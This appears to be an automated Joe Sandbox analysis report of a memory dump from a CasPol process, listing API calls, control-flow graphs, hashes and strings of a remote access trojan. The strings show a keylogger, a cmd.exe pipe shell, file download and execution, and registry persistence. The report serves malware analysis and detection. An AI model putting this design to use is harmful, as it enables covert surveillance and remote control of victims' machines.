                                                                                                              • Part of subcall function 00412513: RegCloseKey.KERNEL32(?), ref: 0041255F
                                                                                                            • StrToIntA.SHLWAPI(00000000,0046BC48,?,00000000,00000000,00474358,00000003,Exe,00000000,0000000E,00000000,0046556C,00000003,00000000), ref: 0041A4D9
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CloseCurrentOpenProcessQueryValue
                                                                                                            • String ID: (32 bit)$ (64 bit)$CurrentBuildNumber$ProductName$SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                                                                                            • API String ID: 1866151309-2070987746
                                                                                                            • Opcode ID: 45f2cc7f8136337c42f5944fd7cecdfc8e179c6ee647a5e14532dc020d3e2dac
                                                                                                            • Instruction ID: 19977b185b3bcff34fa520d2ecc4782d624f476aadfe6515b429a208ce335d2f
                                                                                                            • Opcode Fuzzy Hash: 45f2cc7f8136337c42f5944fd7cecdfc8e179c6ee647a5e14532dc020d3e2dac
                                                                                                            • Instruction Fuzzy Hash: EF11E9A060020166C704B365DCABDBF765ADB90304F50443FB906E31D2EB6C9E9683EE

                                                                                                            Control-flow Graph

                                                                                                            control_flow_graph 1365 409d97-409da7 1366 409e44-409e47 1365->1366 1367 409dad-409daf 1365->1367 1368 409db2-409dd8 call 401e07 CreateFileW 1367->1368 1371 409e18 1368->1371 1372 409dda-409de8 GetFileSize 1368->1372 1375 409e1b-409e1f 1371->1375 1373 409dea 1372->1373 1374 409e0f-409e16 CloseHandle 1372->1374 1376 409df4-409dfb 1373->1376 1377 409dec-409df2 1373->1377 1374->1375 1375->1368 1378 409e21-409e24 1375->1378 1379 409e04-409e09 Sleep 1376->1379 1380 409dfd-409dff call 40a7f0 1376->1380 1377->1374 1377->1376 1378->1366 1381 409e26-409e2d 1378->1381 1379->1374 1380->1379 1381->1366 1383 409e2f-409e3f call 4082dc call 4098a5 1381->1383 1383->1366
                                                                                                            APIs
                                                                                                            • CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,00409E6F), ref: 00409DCD
                                                                                                            • GetFileSize.KERNEL32(00000000,00000000,?,?,?,00409E6F), ref: 00409DDC
                                                                                                            • Sleep.KERNEL32(00002710,?,?,?,00409E6F), ref: 00409E09
                                                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,00409E6F), ref: 00409E10
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: File$CloseCreateHandleSizeSleep
                                                                                                            • String ID: `AG
                                                                                                            • API String ID: 1958988193-3058481221

Control-flow Graph (figure; legend: Executed / Not Executed)
• 4126d2-4126e9 RegCreateKeyA -> 4126eb-412720 (call 4022f8, call 401e8f, RegSetValueExA, RegCloseKey) or -> 412722
• 4126eb-412720 and 412722 -> 412724-412730 (call 401eea)
APIs
• RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 004126E1
• RegSetValueExA.KERNEL32(?,HgF,00000000,?,00000000,00000000,004742F8,?,?,0040E5FB,00466748,5.3.0 Pro), ref: 00412709
• RegCloseKey.KERNEL32(?,?,?,0040E5FB,00466748,5.3.0 Pro), ref: 00412714
Memory Dump Source
• Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
Similarity
• API ID: CloseCreateValue
• String ID: HgF$pth_unenc
• API String ID: 1818849710-3662775637


APIs
• CreateThread.KERNEL32(00000000,00000000,004099A9,?,00000000,00000000), ref: 0040992A
• CreateThread.KERNEL32(00000000,00000000,Function_00009993,?,00000000,00000000), ref: 0040993A
• CreateThread.KERNEL32(00000000,00000000,Function_000099B5,?,00000000,00000000), ref: 00409946
  • Part of subcall function 0040A876: GetLocalTime.KERNEL32(?,?,00000000), ref: 0040A884
  • Part of subcall function 0040A876: wsprintfW.USER32 ref: 0040A905
Memory Dump Source
• Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
Similarity
• API ID: CreateThread$LocalTimewsprintf
• String ID: Offline Keylogger Started
• API String ID: 465354869-4114347211
APIs
• RegCreateKeyA.ADVAPI32(80000001,00000000,TUF), ref: 004127E3
• RegSetValueExA.KERNEL32(TUF,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 004127FE
• RegCloseKey.ADVAPI32(?,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 00412809
Memory Dump Source
• Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
Similarity
• API ID: CloseCreateValue
• String ID: TUF
• API String ID: 1818849710-3431404234
APIs
• CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,00000000,?,00000000,?,?,000000FF,00000000,?,?), ref: 00404778
• CreateThread.KERNEL32(00000000,00000000,?,?,00000000,00000000), ref: 0040478C
• WaitForSingleObject.KERNEL32(?,000000FF,?,00000000,00000000,?,?,00000000), ref: 00404797
• CloseHandle.KERNEL32(?,?,00000000,00000000,?,?,00000000), ref: 004047A0
Memory Dump Source
• Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
Similarity
• API ID: Create$CloseEventHandleObjectSingleThreadWait
• String ID:
• API String ID: 3360349984-0
APIs
• CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,00000000,?,?,00000000,0041B6A5,00000000,00000000,?), ref: 0041B5CE
• SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,0040A009,?,00000000,00000000), ref: 0041B5EB
• WriteFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,0040A009,?,00000000,00000000), ref: 0041B5FF
• CloseHandle.KERNEL32(00000000,?,0040A009,?,00000000,00000000), ref: 0041B60C
Memory Dump Source
• Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
Similarity
• API ID: File$CloseCreateHandlePointerWrite
• String ID:
• API String ID: 3604237281-0
Memory Dump Source
• Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
Similarity
• API ID: CountEventTick
• String ID: >G
• API String ID: 180926312-1296849874
APIs
• CreateMutexA.KERNEL32(00000000,00000001,00000000,0040D9AA,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E,00000000,0046556C,00000003,00000000), ref: 0040BEE6
• GetLastError.KERNEL32 ref: 0040BEF1
Memory Dump Source
• Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
Similarity
• API ID: CreateErrorLastMutex
• String ID: (CG
• API String ID: 1925916568-4210230975
APIs
• RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 00412537
• RegQueryValueExA.KERNEL32(?,?,00000000,00000000,?,00000400), ref: 00412554
• RegCloseKey.KERNEL32(?), ref: 0041255F
Memory Dump Source
• Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
Similarity
• API ID: CloseOpenQueryValue
• String ID:
• API String ID: 3677997916-0
APIs
• RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,00000000,004742F8), ref: 00412679
• RegQueryValueExA.KERNEL32(00000000,00000000,00000000,00000000,00000208,?), ref: 00412692
• RegCloseKey.KERNEL32(00000000), ref: 0041269D
Memory Dump Source
• Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
Similarity
• API ID: CloseOpenQueryValue
• String ID:
• API String ID: 3677997916-0
APIs
• RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?), ref: 004124D7
• RegQueryValueExA.KERNEL32(?,?,00000000,00000000,00000000,?,004742F8), ref: 004124F5
• RegCloseKey.KERNEL32(?), ref: 00412500
Memory Dump Source
• Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
Similarity
• API ID: CloseOpenQueryValue
• String ID:
• API String ID: 3677997916-0
APIs
• RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?,00000000,?,?,0040B996,004660E0), ref: 00412485
• RegQueryValueExA.KERNEL32(?,?,00000000,00000000,00000000,00000000,?,?,0040B996,004660E0), ref: 00412499
• RegCloseKey.KERNEL32(?,?,?,0040B996,004660E0), ref: 004124A4
Memory Dump Source
• Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
Similarity
• API ID: CloseOpenQueryValue
• String ID:
• API String ID: 3677997916-0
                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: _wcslen
                                                                                                            • String ID: xAG
                                                                                                            • API String ID: 176396367-2759412365
                                                                                                            APIs
                                                                                                            • GlobalMemoryStatusEx.KERNEL32(?), ref: 0041A959
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: GlobalMemoryStatus
                                                                                                            • String ID: @
                                                                                                            • API String ID: 1890195054-2766056989
                                                                                                            APIs
                                                                                                            • _free.LIBCMT ref: 0044B9DF
                                                                                                              • Part of subcall function 00446AFF: RtlAllocateHeap.NTDLL(00000000,00434403,?,?,00437227,?,?,?,?,?,0040CC87,00434403,?,?,?,?), ref: 00446B31
                                                                                                            • RtlReAllocateHeap.NTDLL(00000000,00475D30,?,00000004,00000000,?,0044E90A,00475D30,00000004,?,00475D30,?,?,00443125,00475D30,?), ref: 0044BA1B
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: AllocateHeap$_free
                                                                                                            • String ID:
                                                                                                            • API String ID: 1482568997-0
                                                                                                            APIs
                                                                                                            • socket.WS2_32(?,00000001,00000006), ref: 00404212
                                                                                                              • Part of subcall function 00404262: WSAStartup.WS2_32(00000202,00000000), ref: 00404277
                                                                                                            • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 00404252
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CreateEventStartupsocket
                                                                                                            • String ID:
                                                                                                            • API String ID: 1953588214-0
                                                                                                            APIs
                                                                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 00433DE7
                                                                                                              • Part of subcall function 00437BD7: RaiseException.KERNEL32(?,?,00434411,?,?,?,?,?,?,?,?,00434411,?,0046D644,0041AD75,?), ref: 00437C37
                                                                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 00433E04
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Exception@8Throw$ExceptionRaise
                                                                                                            • String ID:
                                                                                                            • API String ID: 3476068407-0
                                                                                                            APIs
                                                                                                            • GetForegroundWindow.USER32 ref: 0041AC74
                                                                                                            • GetWindowTextW.USER32(00000000,?,00000100), ref: 0041AC87
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Window$ForegroundText
                                                                                                            • String ID:
                                                                                                            • API String ID: 29597999-0
                                                                                                            APIs
                                                                                                            • getaddrinfo.WS2_32(00000000,00000000,00000000,00471B28,00474358,00000000,00414240,00000000,00000001), ref: 00413FBC
                                                                                                            • WSASetLastError.WS2_32(00000000), ref: 00413FC1
                                                                                                              • Part of subcall function 00413E37: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00413E86
                                                                                                              • Part of subcall function 00413E37: LoadLibraryA.KERNEL32(?), ref: 00413EC8
                                                                                                              • Part of subcall function 00413E37: GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00413EE8
                                                                                                              • Part of subcall function 00413E37: FreeLibrary.KERNEL32(00000000), ref: 00413EEF
                                                                                                              • Part of subcall function 00413E37: LoadLibraryA.KERNEL32(?), ref: 00413F27
                                                                                                              • Part of subcall function 00413E37: GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00413F39
                                                                                                              • Part of subcall function 00413E37: FreeLibrary.KERNEL32(00000000), ref: 00413F40
                                                                                                              • Part of subcall function 00413E37: GetProcAddress.KERNEL32(00000000,?), ref: 00413F4F
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Library$AddressProc$FreeLoad$DirectoryErrorLastSystemgetaddrinfo
                                                                                                            • String ID:
                                                                                                            • API String ID: 1170566393-0
                                                                                                            APIs
                                                                                                              • Part of subcall function 00448706: RtlAllocateHeap.NTDLL(00000008,0000000A,00000000,?,00446F74,00000001,00000364,?,?,00440C7E,00000000,0000000A,000000FF,0000000A,00000000,?), ref: 00448747
                                                                                                            • _free.LIBCMT ref: 0044EF21
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: AllocateHeap_free
                                                                                                            • String ID:
                                                                                                            • API String ID: 614378929-0
                                                                                                            APIs
                                                                                                            • RtlAllocateHeap.NTDLL(00000008,0000000A,00000000,?,00446F74,00000001,00000364,?,?,00440C7E,00000000,0000000A,000000FF,0000000A,00000000,?), ref: 00448747
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: AllocateHeap
                                                                                                            • String ID:
                                                                                                            • API String ID: 1279760036-0
                                                                                                            APIs
                                                                                                            • RtlAllocateHeap.NTDLL(00000000,00434403,?,?,00437227,?,?,?,?,?,0040CC87,00434403,?,?,?,?), ref: 00446B31
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: AllocateHeap
                                                                                                            • String ID:
                                                                                                            • API String ID: 1279760036-0
                                                                                                            APIs
                                                                                                            • WSAStartup.WS2_32(00000202,00000000), ref: 00404277
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Startup
                                                                                                            • String ID:
                                                                                                            • API String ID: 724789610-0
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: recv
                                                                                                            • String ID:
                                                                                                            • API String ID: 1507349165-0
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: send
                                                                                                            • String ID:
                                                                                                            • API String ID: 2809346765-0
                                                                                                            • Opcode ID: 95a0fd16484bf767f6aff194c57c23075fd16a0a1a5a2095ebc589c6d407ffe4
                                                                                                            • Instruction ID: f30177ef1ac25d972003a71432bbdafa3536f6886768dd9ca1b11e7f0a6bf502
                                                                                                            • Opcode Fuzzy Hash: 95a0fd16484bf767f6aff194c57c23075fd16a0a1a5a2095ebc589c6d407ffe4
                                                                                                            • Instruction Fuzzy Hash: 4FB09279118302BFCA051B60DC0887A7EBAABC9381B108C2CB146512B0CA37C490EB36
                                                                                                            APIs
                                                                                                            • SetEvent.KERNEL32(?,?), ref: 00406F28
                                                                                                            • GetFileAttributesW.KERNEL32(00000000,00000000,00000000), ref: 00406FF8
                                                                                                            • DeleteFileW.KERNEL32(00000000), ref: 00407018
                                                                                                              • Part of subcall function 0041B42F: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B489
                                                                                                              • Part of subcall function 0041B42F: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B4BB
                                                                                                              • Part of subcall function 0041B42F: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B50C
                                                                                                              • Part of subcall function 0041B42F: FindClose.KERNEL32(00000000,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B561
                                                                                                              • Part of subcall function 0041B42F: RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B568
                                                                                                              • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                                                                              • Part of subcall function 00406BE9: CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000,00465454,?,?,00000000,00407273,00000000,?,0000000A,00000000), ref: 00406C38
                                                                                                              • Part of subcall function 00406BE9: WriteFile.KERNEL32(00000000,?,00000000,?,00000000,?,000186A0,?,?,?,00000000,00407273,00000000,?,0000000A,00000000), ref: 00406C80
                                                                                                              • Part of subcall function 00406BE9: CloseHandle.KERNEL32(00000000,?,?,00000000,00407273,00000000,?,0000000A,00000000,00000000), ref: 00406CC0
                                                                                                              • Part of subcall function 00406BE9: MoveFileW.KERNEL32(00000000,00000000), ref: 00406CDD
                                                                                                              • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                                                                              • Part of subcall function 00404468: WaitForSingleObject.KERNEL32(?,00000000,LAL,?,?,00000004,?,?,00000004,00473EE8,004745A8,00000000), ref: 0040450E
                                                                                                              • Part of subcall function 00404468: SetEvent.KERNEL32(?,?,?,00000004,?,?,00000004,00473EE8,004745A8,00000000,?,?,?,?,?,00414CE9), ref: 0040453C
                                                                                                            • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00407416
                                                                                                            • GetLogicalDriveStringsA.KERNEL32(00000064,?), ref: 004074F5
                                                                                                            • SetFileAttributesW.KERNEL32(00000000,?,00000000,00000001), ref: 0040773A
                                                                                                            • DeleteFileA.KERNEL32(?), ref: 004078CC
                                                                                                              • Part of subcall function 00407A8C: __EH_prolog.LIBCMT ref: 00407A91
                                                                                                              • Part of subcall function 00407A8C: FindFirstFileW.KERNEL32(00000000,?,00465AA0,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407B4A
                                                                                                              • Part of subcall function 00407A8C: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407B6E
                                                                                                            • Sleep.KERNEL32(000007D0), ref: 00407976
                                                                                                            • StrToIntA.SHLWAPI(00000000,00000000), ref: 004079BA
                                                                                                              • Part of subcall function 0041BB77: SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041BC6C
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: File$Find$AttributesCloseDeleteDirectoryEventFirstNextRemove$CreateDriveExecuteH_prologHandleInfoLocalLogicalMoveObjectParametersShellSingleSleepStringsSystemTimeWaitWritesend
                                                                                                            • String ID: Browsing directory: $Deleted file: $Downloaded file: $Downloading file: $Executing file: $Failed to download file: $H@G$Unable to delete: $Unable to rename file!$V>G$open$x@G$x@G$x@G$x@G$>G
                                                                                                            • API String ID: 2918587301-599666313
                                                                                                            • Opcode ID: 7bc08a52b947191524a54102a1c70bff9e0a08f253b560fcd637311ad74b5845
                                                                                                            • Instruction ID: 8a4068a2e00c67808ff4e441dc576a613f01372a1abbdcb91e63f440e0dcd641
                                                                                                            • Opcode Fuzzy Hash: 7bc08a52b947191524a54102a1c70bff9e0a08f253b560fcd637311ad74b5845
                                                                                                            • Instruction Fuzzy Hash: 60429371A043005BC614F776C8979AE77A99F90718F40493FF946731E2EE3CAA09C69B
                                                                                                            APIs
                                                                                                            • __Init_thread_footer.LIBCMT ref: 0040508E
                                                                                                              • Part of subcall function 004334CF: EnterCriticalSection.KERNEL32(00470D18,00475D2C,?,0040AEAC,00475D2C,00456D97,?,00000000,00000000), ref: 004334D9
                                                                                                              • Part of subcall function 004334CF: LeaveCriticalSection.KERNEL32(00470D18,?,0040AEAC,00475D2C,00456D97,?,00000000,00000000), ref: 0043350C
                                                                                                              • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                                                                            • __Init_thread_footer.LIBCMT ref: 004050CB
                                                                                                            • CreatePipe.KERNEL32(00475CEC,00475CD4,00475BF8,00000000,0046556C,00000000), ref: 0040515E
                                                                                                            • CreatePipe.KERNEL32(00475CD8,00475CF4,00475BF8,00000000), ref: 00405174
                                                                                                            • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00475C08,00475CDC), ref: 004051E7
                                                                                                              • Part of subcall function 00433519: EnterCriticalSection.KERNEL32(00470D18,?,00475D2C,?,0040AE8B,00475D2C,?,00000000,00000000), ref: 00433524
                                                                                                              • Part of subcall function 00433519: LeaveCriticalSection.KERNEL32(00470D18,?,0040AE8B,00475D2C,?,00000000,00000000), ref: 00433561
                                                                                                            • Sleep.KERNEL32(0000012C,00000093,?), ref: 0040523F
                                                                                                            • PeekNamedPipe.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00405264
                                                                                                            • ReadFile.KERNEL32(00000000,?,?,00000000), ref: 00405291
                                                                                                              • Part of subcall function 004338A5: __onexit.LIBCMT ref: 004338AB
                                                                                                            • WriteFile.KERNEL32(00000000,00000000,?,00000000,00473F98,00465570,00000062,00465554), ref: 0040538E
                                                                                                            • Sleep.KERNEL32(00000064,00000062,00465554), ref: 004053A8
                                                                                                            • TerminateProcess.KERNEL32(00000000), ref: 004053C1
                                                                                                            • CloseHandle.KERNEL32 ref: 004053CD
                                                                                                            • CloseHandle.KERNEL32 ref: 004053D5
                                                                                                            • CloseHandle.KERNEL32 ref: 004053E7
                                                                                                            • CloseHandle.KERNEL32 ref: 004053EF
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CloseCriticalHandleSection$CreatePipe$EnterFileInit_thread_footerLeaveProcessSleep$NamedPeekReadTerminateWrite__onexitsend
                                                                                                            • String ID: P\G$P\G$P\G$P\G$P\G$SystemDrive$cmd.exe
                                                                                                            • API String ID: 3815868655-81343324
                                                                                                            • Opcode ID: 5a5e837b1a5c73d244bdc50f52d0c0277f8ea75593c2154cdaf09b4041bb4b09
                                                                                                            • Instruction ID: b18bac6d60c4c725a58799f80733fb47b3e4e6a61b1262bf76379e9ec18ff918
                                                                                                            • Opcode Fuzzy Hash: 5a5e837b1a5c73d244bdc50f52d0c0277f8ea75593c2154cdaf09b4041bb4b09
                                                                                                            • Instruction Fuzzy Hash: A691E5716007056FD705BB65AC41A6F37A8EB80348F50403FF94ABA1E2EEBC9C448B6D
                                                                                                            APIs
                                                                                                            • GetCurrentProcessId.KERNEL32 ref: 00410F45
                                                                                                              • Part of subcall function 004127D5: RegCreateKeyA.ADVAPI32(80000001,00000000,TUF), ref: 004127E3
                                                                                                              • Part of subcall function 004127D5: RegSetValueExA.KERNEL32(TUF,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 004127FE
                                                                                                              • Part of subcall function 004127D5: RegCloseKey.ADVAPI32(?,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 00412809
                                                                                                            • OpenMutexA.KERNEL32(00100000,00000000,00000000), ref: 00410F81
                                                                                                            • CreateThread.KERNEL32(00000000,00000000,00411637,00000000,00000000,00000000), ref: 00410FE6
                                                                                                              • Part of subcall function 004124B7: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?), ref: 004124D7
                                                                                                              • Part of subcall function 004124B7: RegQueryValueExA.KERNEL32(?,?,00000000,00000000,00000000,?,004742F8), ref: 004124F5
                                                                                                              • Part of subcall function 004124B7: RegCloseKey.KERNEL32(?), ref: 00412500
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00410F90
                                                                                                              • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                                                                            • OpenProcess.KERNEL32(001FFFFF,00000000,?), ref: 0041125A
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
